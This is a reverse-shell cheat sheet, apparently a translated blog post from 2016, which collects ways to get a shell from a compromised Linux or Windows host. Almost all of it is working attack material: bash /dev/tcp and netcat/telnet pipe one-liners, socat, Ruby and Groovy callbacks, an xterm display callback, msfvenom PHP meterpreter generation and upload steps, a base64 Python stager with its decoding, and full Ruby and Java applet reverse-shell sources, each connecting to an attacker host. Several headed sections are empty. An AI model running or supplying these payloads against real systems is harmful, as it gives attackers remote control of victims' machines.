Linux reverse shell
2016-10-09 10:11
References
http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html
http://www.waitalone.cn/linux-shell-rebound-under-way.html
http://roo7break.co.uk/?p=215
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.91ri.org/9367.html
http://www.tuicool.com/articles/3uQ3ue
Further reading
Running commands at Linux startup: http://www.cnblogs.com/ssooking/p/6094740.html
Callback IP: 10.0.0.1
Listening port: 1234
Bash
[The target's shell is sometimes bash and sometimes sh (dash, busybox), so the bash form below is not guaranteed to work.] Note: /dev/tcp/host/port and /dev/udp/host/port are not real files on disk; they are pseudo-devices implemented inside bash itself, so redirecting to or from them is equivalent to creating a socket and connecting to host:port. A shell that is not bash will simply report "No such file or directory".
In a Linux shell "&" normally means "run in the background", but in 0>&1 it does not: "&1" means file descriptor 1, and descriptor 1 is normally STDOUT_FILENO. So 0>&1 makes descriptor 0 (stdin) a duplicate of descriptor 1; since descriptor 1 has already been pointed at the socket, the shell now reads its commands from the same connection it writes to.
The form 2>&1 is likewise a redirection: "2>" redirects standard error, and "&1" names standard output. Take ls > /dev/null 2>&1 as an example: 2>&1 sends standard error to wherever standard output currently points, and standard output has already been redirected to /dev/null, so both streams end up there. The order matters: ls 2>&1 > /dev/null would copy stderr to the terminal first and only then silence stdout.
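The descriptor semantics above are easy to get backwards, so here is a small script (added for this edit, not part of the original post) that shows the two points without any network: the order of redirections decides where stderr lands, and a descriptor duplicated with 0<&N (or 0>&N) lets sh read its commands from another open descriptor exactly the way the reverse shell reads them from the socket. The temporary file and the echo command fed through it are constructed for the demo.

```shell
#!/bin/sh
# Added example: redirection order, and stdin duplicated from another fd.

# fd1 -> /dev/null first, THEN fd2 duplicates fd1: both streams are silenced.
silence_both() {
    ls /nonexistent_path_for_demo > /dev/null 2>&1 || :
}

# fd2 duplicates fd1 (still the caller's stdout) BEFORE fd1 goes to
# /dev/null: the error message still reaches the caller.
leak_stderr() {
    ls /nonexistent_path_for_demo 2>&1 > /dev/null || :
}

# A reverse shell runs "bash -i > /dev/tcp/HOST/PORT 0<&1 2>&1": fd1 is the
# socket and fd0 becomes a copy of it, so commands are read from the same
# connection the output is written to. A socket is read/write; a file opened
# with ">" is write-only, so here a temp file is opened with "<>" (read/write,
# like the socket) to reproduce the trick locally. (Constructed demo input.)
dup_stdin_from_fd() {
    tmp=$(mktemp) || return 1
    printf 'echo hello-from-dup\n' > "$tmp"   # the "remote" command bytes
    exec 3<> "$tmp"                           # fd3: read/write on the file
    sh 0<&3                                   # sh reads its script from fd3
    exec 3>&-
    rm -f "$tmp"
}

silence_both          # prints nothing
leak_stderr           # prints the ls error on stdout
dup_stdin_from_fd     # prints: hello-from-dup
```

Run it with sh or bash; the only line that appears is the ls error from leak_stderr followed by hello-from-dup, which is the whole point: with > /dev/null 2>&1 nothing escapes, with 2>&1 > /dev/null the error does.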
Additional notes:
Netcat
Not every version of nc supports the -e option (it is compiled out of many distribution builds, so check nc -h on the target first).
Windows target:
nc -e cmd.exe 10.0.0.1 1234
Linux target:
nc -e /bin/sh 10.0.0.1 1234

nc without -e (a named pipe carries the shell's output back into nc):
Hacker:  nc -lvnp 1234
Victim:  mknod /tmp/backpipe p
Victim:  /bin/sh 0</tmp/backpipe | nc 10.0.0.1 1234 1>/tmp/backpipe

Without nc on the victim (Methods 4 and 5 below do still use nc, but without -e):
Method 1:
Hacker:  nc -nvlp 1234
Victim:  /bin/bash -i > /dev/tcp/10.0.0.1/1234 0<&1 2>&1
Method 2:
Hacker:  nc -nvlp 1234
Victim:  mknod backpipe p && telnet 10.0.0.1 1234 0<backpipe | /bin/bash 1>backpipe
Method 3 (two listeners: commands arrive on one connection, output leaves on the other, so the victim's two telnet ports must match the two listeners):
Hacker:  nc -nvlp 8080
Hacker:  nc -nvlp 8888
Victim:  telnet 10.0.0.1 8080 | /bin/bash | telnet 10.0.0.1 8888
Method 4:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
Method 5 (same two-connection idea as Method 3, with nc; the second listener is on x.x.x.x:2444):
nc 10.0.0.1 1234 | /bin/sh | nc x.x.x.x 2444
socat
socat tcp-connect:<listener IP>:<listener port> exec:'bash -li',pty,stderr,setsid,sigint,sane
tcp-connect: is the address of your listener; exec: runs an interactive login bash on a pseudo-terminal, with stderr merged in, in its own session and with signals and terminal settings passed through, which gives a far more usable shell than the nc variants. socat is a very powerful tool; as an aside, a few more of its uses:
PERL
Python
Metasploit's Python stager:
# msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
After base64 decoding (this is only the stager: it reads a 4-byte big-endian length, receives that many bytes of Python from the listener and exec()s them with the socket passed in as s):
import socket, struct
s = socket.socket(2, 1)                 # AF_INET, SOCK_STREAM
s.connect(('192.168.90.1', 1234))
l = struct.unpack('>I', s.recv(4))[0]   # length of the stage that follows
d = s.recv(4096)
while len(d) != l:
    d += s.recv(4096)
exec(d, {'s': s})                       # the stage reuses the open socket
PHP
Ruby
Does not depend on /bin/sh (the forked child stays alive after the parent exits):
ruby -rsocket -e 'exit if fork; c=TCPSocket.new("10.0.0.1","1234"); while(cmd=c.gets); IO.popen(cmd,"r"){|io| c.print io.read} end'
When the target is Windows (no fork):
ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","1234"); while(cmd=c.gets); IO.popen(cmd,"r"){|io| c.print io.read} end'
Java
This is the Groovy form from the pentestmonkey cheat sheet cited above (the first line obtains the Runtime; the page omitted it). bash is started with descriptor 5 opened read/write on the socket, and each line read from it is executed with its output sent back through descriptor 5:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/10.0.0.1/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
msf: use payload/java/shell/reverse_tcp
Telnet
Or:
mknod backpipe p && telnet 10.0.0.1 1234 0<backpipe | /bin/bash 1>backpipe
lua
msf reverse shell: use payload/cmd/unix/reverse_lua
Xterm
First start an X server (display :1 listens on TCP 6001):
Xnest :1    # Note: the command starts with an uppercase X
Grant the target permission to connect back:
xterm -display 127.0.0.1:1    # Run this OUTSIDE the Xnest, in another tab
xhost +targetip    # Run this INSIDE the spawned xterm on the open X server
To let anyone connect (this opens your X server to every host that can reach port 6001, so prefer the per-host form):
xhost +    # Run this INSIDE the spawned xterm on the open X server
Assuming xterm is installed on the target, connect back to your X server:
xterm -display attackerip:1
Or:
$ DISPLAY=attackerip:1 xterm
(The display number must match the Xnest display, :1 above.)
Generating a web reverse shell with msfvenom
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw > test.php
After generating it, remove the comment marker at the very start of the script (the file must begin with a plain <?php tag or the server will not execute it), then upload it to the target server.
Start msf and set up the handler (the handler module has to be selected before the payload options can be set):
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <port>
exploit -j
Then open the uploaded script in a browser, http://xxx.com/test.php, and the session comes back to the handler.
# Reverse SSH shell
Some longer scripts from msf modules
Ruby
require 'socket'
require 'open3'

# Set the Remote Host IP
RHOST = "192.168.1.10"
# Set the Remote Host Port
PORT = "6667"

# Tries to connect every 20 sec until it connects.
begin
  sock = TCPSocket.new "#{RHOST}", "#{PORT}"
  sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

# Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do |stdin, stdout_and_stderr|
      IO.copy_stream(stdout_and_stderr, sock)
    end
  end
rescue
  retry
end
JAVA
import java.io.*;           // File, PrintWriter, BufferedReader, InputStreamReader (missing on the page)
import java.net.Socket;
import java.util.*;
import java.util.regex.*;
import java.applet.Applet;

public class poc extends Applet {
    /**
     * Author: daniel baier alias duddits
     * License: GPL
     * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher
     * Version: 0.1 alpha release
     */
    // Builds the new working directory for "cd <start>" relative to currentDir.
    public String cd(String start, File currentDir) {
        File fullPath = new File(currentDir.getAbsolutePath());
        String sparent = fullPath.getAbsoluteFile().toString();
        return sparent + "/" + start;
    }

    @SuppressWarnings("unchecked")
    public void init() {
        poc rs = new poc();
        PrintWriter out;
        try {
            // Connect back to the attacker's listener.
            Socket clientSocket = new Socket("192.168.5.222", 10003);
            out = new PrintWriter(clientSocket.getOutputStream(), true);
            out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");
            boolean run = true;
            String s;
            BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));
            String startort = "/";   // current working directory of the shell
            while (run) {
                String z1;
                File f = new File(startort);
                out.println(f.getAbsolutePath() + ">");
                s = br.readLine();
                if (s == null) {     // peer closed the connection
                    break;
                }
                z1 = s;
                Pattern pcd = Pattern.compile("^cd\\s");
                Matcher mcd = pcd.matcher(z1);
                String[] teile1 = pcd.split(z1);
                if (s.equals("exit")) {
                    run = false;
                } else if (s.equals("cmd") || s.equals("")) {
                    // nothing to run
                } else if (mcd.find()) {
                    try {
                        String cds = rs.cd(teile1[1], new File(startort));
                        startort = cds;
                    } catch (Exception verz) {
                        out.println("Path " + teile1[1] + " not found.");
                    }
                } else {
                    // Split the line on whitespace and run it as argv in the current directory.
                    String z2;
                    z2 = s;
                    Pattern pstring = Pattern.compile("\\s");
                    String[] plist = pstring.split(z2);
                    try {
                        LinkedList slist = new LinkedList();
                        for (int i = 0; i < plist.length; i++) {
                            slist.add(plist[i]);
                        }
                        ProcessBuilder builder = new ProcessBuilder(slist);
                        builder.directory(new File(startort));
                        Process p = builder.start();
                        Scanner se = new Scanner(p.getInputStream());
                        if (!se.hasNext()) {
                            // No stdout: relay stderr instead.
                            Scanner sa = new Scanner(p.getErrorStream());
                            while (sa.hasNext()) {
                                out.println(sa.nextLine());
                            }
                        }
                        while (se.hasNext()) {
                            out.println(se.nextLine());
                        }
                    } catch (Exception err) {
                        out.println(f.getAbsolutePath() + "> Command " + s + " failed!");
                        out.println(f.getAbsolutePath() + "> Please try cmd /c " + s + " or bash -c " + s + " if this command is a shell builtin.");
                    }
                }
            }
            if (!clientSocket.isConnected()) {
                run = false;
                out.flush();
                out.close();
            }
        } catch (Exception io) {
            // System.err.println("Connection refused by peer");
        }
    }
}